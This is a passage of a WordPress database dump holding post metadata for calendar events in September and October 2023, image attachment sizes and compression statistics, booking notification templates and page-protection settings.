AM'),(190664,268947,'mec_sequence','17'),(190665,268947,'mec_event_gallery','a:0:{}'),(190666,268947,'mec_related_events','a:0:{}'),(190667,268947,'mec_banner','a:0:{}'),(190669,268947,'_dp_original','268843'),(190670,268947,'_edit_lock','1693408954:2'),(190671,268947,'_edit_last','2'),(190672,268948,'_wp_attached_file','2023/08/HU-chela-master-1.jpg'),(190673,268948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:795;s:6:\"height\";i:451;s:4:\"file\";s:29:\"2023/08/HU-chela-master-1.jpg\";s:8:\"filesize\";i:161656;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-345x196.jpg\";s:5:\"width\";i:345;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33949;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17538;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-768x436.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115572;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39525;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-500x451.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88354;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60542;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44231;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"HU-chela-master-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47913;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:8:\"DSC-W730\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1519078047\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"5.91\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190674,268948,'original-file','2023/08/HU-chela-master-1-updraft-pre-smush-original.jpg'),(190675,268948,'smush-complete','1'),(190676,268948,'smush-info','The file was compressed from 157.87 KB to 130.66 KB, saving 17.23 percent, using WP-Optimize'),(190677,268948,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:161656;s:12:\"smushed-size\";i:133796;s:15:\"savings-percent\";d:17.230000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:161656;s:10:\"compressed\";i:133796;}s:6:\"medium\";a:2:{s:8:\"original\";i:33949;s:10:\"compressed\";i:24260;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:17538;s:10:\"compressed\";i:16531;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:115572;s:10:\"compressed\";i:103162;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:39525;s:10:\"compressed\";i:29673;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:88354;s:10:\"compressed\";i:76489;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:60542;s:10:\"compressed\";i:49966;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:44231;s:10:\"compressed\";i:34272;}s:8:\"tileview\";a:2:{s:8:\"original\";i:47913;s:10:\"compressed\";i:37865;}}}'),(190678,268950,'protect_children',''),(190679,268950,'mec_color',''),(190680,268950,'mec_location_id','185'),(190681,268950,'mec_dont_show_map','0'),(190682,268950,'mec_organizer_id','1'),(190683,268950,'mec_start_date','2023-09-24'),(190684,268950,'mec_start_time_hour','10'),(190685,268950,'mec_start_time_minutes','30'),(190686,268950,'mec_start_time_ampm','AM'),(190687,268950,'mec_start_day_seconds','37800'),(190688,268950,'mec_end_date','2023-09-24'),(190689,268950,'mec_end_time_hour','11'),(190690,268950,'mec_end_time_minutes','30'),(190691,268950,'mec_end_time_ampm','AM'),(190692,268950,'mec_end_day_seconds','41400'),(190693,268950,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-24\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190694,268950,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190695,268950,'mec_certain_weekdays','a:0:{}'),(190696,268950,'mec_allday','0'),(190697,268950,'mec_hide_time','0'),(190698,268950,'mec_hide_end_time','0'),(190699,268950,'mec_comment',''),(190700,268950,'mec_repeat_status','0'),(190701,268950,'mec_repeat_type',''),(190702,268950,'mec_repeat_interval','1'),(190703,268950,'mec_repeat_end',''),(190704,268950,'mec_repeat_end_at_occurrences',''),(190705,268950,'mec_repeat_end_at_date',''),(190706,268950,'mec_advanced_days','a:0:{}'),(190707,268950,'mec_in_days',''),(190708,268950,'mec_not_in_days',''),(190709,268950,'mec_hourly_schedules','a:0:{}'),(190710,268950,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190711,268950,'mec_tickets','a:0:{}'),(190712,268950,'mec_fees_global_inheritance','1'),(190713,268950,'mec_fees','a:0:{}'),(190714,268950,'mec_ticket_variations_global_inheritance','1'),(190715,268950,'mec_ticket_variations','a:0:{}'),(190716,268950,'mec_reg_fields_global_inheritance','1'),(190717,268950,'mec_reg_fields','a:0:{}'),(190718,268950,'mec_op','a:0:{}'),(190719,268950,'mec_event_date_submit','20210422105713'),(190720,268950,'mec_read_more',''),(190721,268950,'mec_more_info',''),(190722,268950,'mec_more_info_title',''),(190723,268950,'mec_more_info_target','_self'),(190724,268950,'mec_cost',''),(190725,268950,'mec_currency','a:0:{}'),(190726,268950,'mec_additional_organizer_ids','a:0:{}'),(190727,268950,'mec_additional_location_ids','a:0:{}'),(190728,268950,'one_occurrence','0'),(190729,268950,'mec_timezone','global'),(190730,268950,'mec_countdown_method','global'),(190731,268950,'mec_public','1'),(190732,268950,'mec_bfixed_fields','a:0:{}'),(190733,268950,'mec_fields','a:0:{}'),(190734,268950,'mec_event_status','EventScheduled'),(190735,268950,'mec_moved_online_link',''),(190736,268950,'mec_cancelled_reason',''),(190737,268950,'mec_display_cancellation_reason_in_single_page',''),(190738,268950,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190739,268950,'passster_activate_global_protection',NULL),(190740,268950,'passster_activate_protection',NULL),(190741,268950,'passster_protection_type','password'),(190742,268950,'_wp_old_date','2022-01-18'),(190743,268950,'boldgrid_in_page_containers','1'),(190756,268950,'_dp_original','268251'),(190745,268950,'passster_area_shortcode',''),(190746,268950,'mec_cost_auto_calculate','0'),(190747,268950,'mec_style_per_event','global'),(190748,268950,'mec_trailer_url',''),(190749,268950,'mec_trailer_title',''),(190750,268950,'mec_start_datetime','2023-09-24 10:30 AM'),(190751,268950,'mec_end_datetime','2023-09-24 11:30 AM'),(190752,268950,'mec_sequence','10'),(190753,268950,'mec_event_gallery','a:0:{}'),(190754,268950,'mec_related_events','a:0:{}'),(190755,268950,'mec_banner','a:0:{}'),(190757,268950,'_edit_lock','1693409782:2'),(190758,268950,'_edit_last','2'),(190759,268951,'_wp_attached_file','2023/08/sky-above-columns-1.jpg'),(190760,268951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:801;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2023/08/sky-above-columns-1.jpg\";s:8:\"filesize\";i:70472;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16451;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6577;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56045;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19705;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-500x450.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42467;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30934;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22190;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"sky-above-columns-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23543;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190761,268950,'_thumbnail_id','268951'),(190762,268951,'original-file','2023/08/sky-above-columns-1-updraft-pre-smush-original.jpg'),(190763,268951,'smush-complete','1'),(190764,268951,'smush-info','The file was compressed from 68.82 KB to 67.13 KB, saving 2.46 percent, using WP-Optimize'),(190765,268951,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70472;s:12:\"smushed-size\";i:68739;s:15:\"savings-percent\";d:2.45999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:70472;s:10:\"compressed\";i:68739;}s:6:\"medium\";a:2:{s:8:\"original\";i:16451;s:10:\"compressed\";i:16357;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6577;s:10:\"compressed\";i:6511;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:56045;s:10:\"compressed\";i:56045;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19705;s:10:\"compressed\";i:19534;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:42467;s:10:\"compressed\";i:42342;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:30934;s:10:\"compressed\";i:30750;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22190;s:10:\"compressed\";i:22040;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23543;s:10:\"compressed\";i:23490;}}}'),(190766,268953,'protect_children',''),(190767,268953,'mec_color',''),(190768,268953,'mec_location_id','171'),(190769,268953,'mec_dont_show_map','0'),(190770,268953,'mec_organizer_id','1'),(190771,268953,'mec_read_more',''),(190772,268953,'mec_more_info',''),(190773,268953,'mec_more_info_title',''),(190774,268953,'mec_more_info_target','_self'),(190775,268953,'mec_cost',''),(190776,268953,'mec_currency','a:0:{}'),(190777,268953,'mec_additional_organizer_ids','a:0:{}'),(190778,268953,'mec_additional_location_ids','a:0:{}'),(190779,268953,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-21\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-21\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190780,268953,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190781,268953,'mec_certain_weekdays','a:0:{}'),(190782,268953,'mec_allday','0'),(190783,268953,'one_occurrence','0'),(190784,268953,'mec_hide_time','0'),(190785,268953,'mec_hide_end_time','0'),(190786,268953,'mec_comment',''),(190787,268953,'mec_timezone','global'),(190788,268953,'mec_countdown_method','global'),(190789,268953,'mec_public','1'),(190790,268953,'mec_start_date','2023-09-21'),(190791,268953,'mec_start_time_hour','7'),(190792,268953,'mec_start_time_minutes','0'),(190793,268953,'mec_start_time_ampm','PM'),(190794,268953,'mec_start_day_seconds','68400'),(190795,268953,'mec_end_date','2023-09-21'),(190796,268953,'mec_end_time_hour','8'),(190797,268953,'mec_end_time_minutes','0'),(190798,268953,'mec_end_time_ampm','PM'),(190799,268953,'mec_end_day_seconds','72000'),(190800,268953,'mec_repeat_status','0'),(190801,268953,'mec_repeat_type',''),(190802,268953,'mec_repeat_interval','1'),(190803,268953,'mec_repeat_end',''),(190804,268953,'mec_repeat_end_at_occurrences',''),(190805,268953,'mec_repeat_end_at_date',''),(190806,268953,'mec_advanced_days','a:0:{}'),(190807,268953,'mec_in_days',''),(190808,268953,'mec_not_in_days',''),(190809,268953,'mec_hourly_schedules','a:0:{}'),(190810,268953,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190811,268953,'mec_tickets','a:0:{}'),(190812,268953,'mec_fees_global_inheritance','1'),(190813,268953,'mec_fees','a:0:{}'),(190814,268953,'mec_ticket_variations_global_inheritance','1'),(190815,268953,'mec_ticket_variations','a:0:{}'),(190816,268953,'mec_reg_fields_global_inheritance','1'),(190817,268953,'mec_reg_fields','a:0:{}'),(190818,268953,'mec_bfixed_fields','a:0:{}'),(190819,268953,'mec_op','a:0:{}'),(190820,268953,'mec_fields','a:0:{}'),(190821,268953,'mec_event_status','EventScheduled'),(190822,268953,'mec_moved_online_link',''),(190823,268953,'mec_cancelled_reason',''),(190824,268953,'mec_display_cancellation_reason_in_single_page',''),(190825,268953,'boldgrid_hide_page_title','0'),(190826,268953,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190827,268953,'passster_activate_global_protection',NULL),(190828,268953,'passster_activate_protection',NULL),(190829,268953,'passster_protection_type','password'),(190830,268953,'boldgrid_in_page_containers','1'),(190844,268953,'_dp_original','267696'),(190832,268953,'passster_area_shortcode',''),(190833,268953,'_wp_old_date','2023-01-14'),(190834,268953,'mec_cost_auto_calculate','0'),(190835,268953,'mec_style_per_event','global'),(190836,268953,'mec_trailer_url',''),(190837,268953,'mec_trailer_title',''),(190838,268953,'mec_start_datetime','2023-09-21 07:00 PM'),(190839,268953,'mec_end_datetime','2023-09-21 08:00 PM'),(190840,268953,'mec_sequence','28'),(190841,268953,'mec_event_gallery','a:0:{}'),(190842,268953,'mec_related_events','a:0:{}'),(190843,268953,'mec_banner','a:0:{}'),(190845,268953,'_edit_lock','1693412052:2'),(190846,268953,'_edit_last','2'),(190847,268954,'_wp_attached_file','2023/08/archway-garden-2.jpg'),(190848,268954,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:767;s:6:\"height\";i:432;s:4:\"file\";s:28:\"2023/08/archway-garden-2.jpg\";s:8:\"filesize\";i:114252;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30893;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15402;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30262;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-500x432.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58114;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48245;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37248;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"archway-garden-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:26:\"Canon EOS DIGITAL REBEL XT\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1156170862\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"46\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190849,268953,'_thumbnail_id','268954'),(190850,268954,'original-file','2023/08/archway-garden-2-updraft-pre-smush-original.jpg'),(190851,268954,'smush-complete','1'),(190852,268954,'smush-info','The file was compressed from 111.57 KB to 90.75 KB, saving 18.67 percent, using WP-Optimize'),(190853,268954,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:114252;s:12:\"smushed-size\";i:92924;s:15:\"savings-percent\";d:18.6700000000000017053025658242404460906982421875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:114252;s:10:\"compressed\";i:92924;}s:6:\"medium\";a:2:{s:8:\"original\";i:30893;s:10:\"compressed\";i:22585;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15402;s:10:\"compressed\";i:7632;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:30262;s:10:\"compressed\";i:22289;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:58114;s:10:\"compressed\";i:49426;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:48245;s:10:\"compressed\";i:39667;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:37248;s:10:\"compressed\";i:28897;}s:8:\"tileview\";a:2:{s:8:\"original\";i:31765;s:10:\"compressed\";i:23960;}}}'),(190854,261549,'passster_area_shortcode',''),(190855,268956,'_wp_attached_file','2023/08/RESA-Org-Chart-5.13.23rev-blue.pdf'),(190856,268956,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:38:\"RESA-Org-Chart-5.13.23rev-blue-pdf.jpg\";s:5:\"width\";i:2176;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216283;}s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"RESA-Org-Chart-5.13.23rev-blue-pdf-303x196.jpg\";s:5:\"width\";i:303;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12388;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"RESA-Org-Chart-5.13.23rev-blue-pdf-1024x663.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:663;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73534;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"RESA-Org-Chart-5.13.23rev-blue-pdf-150x97.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6069;}}s:8:\"filesize\";i:224954;}'),(190857,261549,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(190858,268958,'protect_children',''),(190859,268958,'mec_color',''),(190860,268958,'mec_location_id','162'),(190861,268958,'mec_dont_show_map','0'),(190862,268958,'mec_organizer_id','1'),(190863,268958,'mec_read_more',''),(190864,268958,'mec_more_info',''),(190865,268958,'mec_more_info_title',''),(190866,268958,'mec_more_info_target','_self'),(190867,268958,'mec_cost',''),(190868,268958,'mec_currency','a:0:{}'),(190869,268958,'mec_additional_organizer_ids','a:0:{}'),(190870,268958,'mec_additional_location_ids','a:0:{}'),(190871,268958,'mec_date','a:6:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-21\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-22\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:9:\"hide_time\";s:1:\"1\";s:13:\"hide_end_time\";s:1:\"1\";s:7:\"comment\";s:21:\"October 20–22, 2023\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190872,268958,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190873,268958,'mec_certain_weekdays','a:0:{}'),(190874,268958,'mec_allday','0'),(190875,268958,'one_occurrence','0'),(190876,268958,'mec_hide_time','1'),(190877,268958,'mec_hide_end_time','1'),(190878,268958,'mec_comment','October 20–22, 2023'),(190879,268958,'mec_timezone','global'),(190880,268958,'mec_countdown_method','global'),(190881,268958,'mec_public','1'),(190882,268958,'mec_start_date','2023-10-21'),(190883,268958,'mec_start_time_hour','8'),(190884,268958,'mec_start_time_minutes','0'),(190885,268958,'mec_start_time_ampm','AM'),(190886,268958,'mec_start_day_seconds','28800'),(190887,268958,'mec_end_date','2023-10-22'),(190888,268958,'mec_end_time_hour','6'),(190889,268958,'mec_end_time_minutes','0'),(190890,268958,'mec_end_time_ampm','PM'),(190891,268958,'mec_end_day_seconds','64800'),(190892,268958,'mec_repeat_status','0'),(190893,268958,'mec_repeat_type',''),(190894,268958,'mec_repeat_interval','1'),(190895,268958,'mec_repeat_end',''),(190896,268958,'mec_repeat_end_at_occurrences','9'),(190897,268958,'mec_repeat_end_at_date',''),(190898,268958,'mec_advanced_days','a:0:{}'),(190899,268958,'mec_in_days',''),(190900,268958,'mec_not_in_days',''),(190901,268958,'mec_hourly_schedules','a:0:{}'),(190902,268958,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0